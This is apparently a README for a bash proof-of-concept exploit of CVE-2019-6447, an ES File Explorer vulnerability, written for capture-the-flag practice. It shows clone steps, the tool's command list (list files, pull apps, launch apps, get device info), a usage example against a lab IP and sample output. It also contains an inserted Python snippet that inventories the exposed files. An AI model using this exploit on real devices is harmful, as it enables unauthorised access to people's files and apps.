This is a very simple bash implementation of the CVE-2019-6447 PoC. It uses curl to send the requests with the right parameters. I built it because I was looking for a similar script during a CTF and couldn't find one. You can play around with the original script and customize it however you like.
Simply clone the repository and use the .sh file.
git clone git@github.com:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
Or copy and paste the raw content to a file.
kyoto :: ~ % ./ESExplorerExploit.sh -h
--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---
You can try the following commands:
listFiles List all files
listPics List all pictures
listVideos List all videos
listAudios List all audios
listApps List all applications installed
listAppsSystem List system apps
listAppsPhone List communication related applications
listAppsSdcard List the apps installed on the sd card
listAppsAll List all applications
getAppThumbnail List icons for the specified application
appLaunch Start the developed application
appPull Download an application from your device
getDeviceInfo Get system information
Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
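The listFiles output above is not strict JSON: every object carries a trailing comma before its closing brace, so a standard parser rejects it. The following added example (not part of the original repository) normalizes that output in Python so the exposed files can be inventoried; the function names are hypothetical and the sample is the listing shown above.

```python
import json
import re

# Sample input: the listFiles output shown above, trailing commas included.
SAMPLE = '''[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]'''

# Match whole string literals first so commas inside values (for example
# "138,573 Bytes") are never touched; otherwise match a comma that is
# followed only by whitespace and a closing brace or bracket.
_STRING_OR_TRAILING_COMMA = re.compile(r'"(?:\\.|[^"\\])*"|,(?=\s*[}\]])')
_BYTES = re.compile(r'\(([\d,]+) Bytes\)')


def strip_trailing_commas(text):
    """Remove trailing commas before } or ], leaving string contents intact."""
    def keep_strings(match):
        token = match.group(0)
        return token if token.startswith('"') else ''
    return _STRING_OR_TRAILING_COMMA.sub(keep_strings, text)


def parse_listing(text):
    """Parse a listing and add an integer 'bytes' field taken from 'size'."""
    entries = json.loads(strip_trailing_commas(text))
    for entry in entries:
        match = _BYTES.search(entry.get("size", ""))
        entry["bytes"] = int(match.group(1).replace(",", "")) if match else None
    return entries


def summarize(entries):
    """Count exposed files and total their exact byte sizes."""
    files = [e for e in entries if e.get("type") == "file"]
    return {"files": len(files),
            "total_bytes": sum(e["bytes"] or 0 for e in files)}


if __name__ == "__main__":
    listing = parse_listing(SAMPLE)
    for item in listing:
        print(f'{item["bytes"]:>10}  {item["name"]}')
    print(summarize(listing))
```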
If you're curious about how this exploit works behind the scenes, or if it fails and you have to build your own script, you can read the following links:
https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566